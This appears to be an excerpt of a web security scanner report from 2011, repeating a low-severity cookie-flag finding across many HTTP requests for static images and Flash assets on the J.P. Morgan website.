GET /images/homepage/2008_flash/img/img2.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78a-191c-e3c43640" Accept-Ranges: bytes Content-Length: 6428 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img3.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78b-176c-e3c43640" Accept-Ranges: bytes Content-Length: 5996 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img4.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78c-10b2-e3c43640" Accept-Ranges: bytes Content-Length: 4274 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/img5.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a78d-1032-e3c43640" Accept-Ranges: bytes Content-Length: 4146 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/largeImg4.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:32:14 GMT Server: Apache Last-Modified: Fri, 22 Aug 2008 17:37:21 GMT ETag: "32a791-2ebd-e3c43640" Accept-Ranges: bytes Content-Length: 11965 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/swf/module.swf HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Mon, 18 Aug 2008 15:32:28 GMT ETag: "32a785-6dd6-adc89b00" Accept-Ranges: bytes Content-Length: 28118 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-shockwave-flash
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/xml/module_data.xml HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/images/homepage/2008_flash/swf/module.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 23 Aug 2008 13:28:21 GMT ETag: "32a782-6e9-871d4740" Accept-Ranges: bytes Content-Length: 1769 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/xml
<items> <item img="img/img1.jpg" largeImg="img/largeImg1.jpg" header="Corporations" link="/pages/jpmorgan/home/corporations" >J.P. Morgan offers trusted and intelligent advice to help corporations ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/shadow_bt_820.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 14:03:40 GMT ETag: "1fc6c-4db-f7a8700" Accept-Ranges: bytes Content-Length: 1243 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/shadow_lt.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 14:04:04 GMT ETag: "1fc6d-600-10e8bd00" Accept-Ranges: bytes Content-Length: 1536 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/shadow_rt.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Wed, 13 Oct 2010 14:04:25 GMT ETag: "1fc6e-621-12292c40" Accept-Ranges: bytes Content-Length: 1569 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/close_large.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:18 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT ETag: "42d45-412-697f3180" Accept-Ranges: bytes Content-Length: 1042 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/close_small.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:18 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT ETag: "42d46-257-697f3180" Accept-Ranges: bytes Content-Length: 599 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_close.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:23 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT ETag: "42d47-340-697f3180" Accept-Ranges: bytes Content-Length: 832 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_next.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:23 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:46 GMT ETag: "42d48-2f0-697f3180" Accept-Ranges: bytes Content-Length: 752 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_prev.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:19 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d49-2e7-698e73c0" Accept-Ranges: bytes Content-Length: 743 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_slideshow_play.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:23 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d4b-363-698e73c0" Accept-Ranges: bytes Content-Length: 867 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/controller_slideshow_stop.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:19 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d4c-2aa-698e73c0" Accept-Ranges: bytes Content-Length: 682 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/inner_next.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:19 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d4e-134-698e73c0" Accept-Ranges: bytes Content-Length: 308 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/inner_prev.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:18 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d4f-133-698e73c0" Accept-Ranges: bytes Content-Length: 307 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/lightview/inner_slideshow_stop.png HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:18 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT ETag: "42d51-1fa-698e73c0" Accept-Ranges: bytes Content-Length: 506 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/png
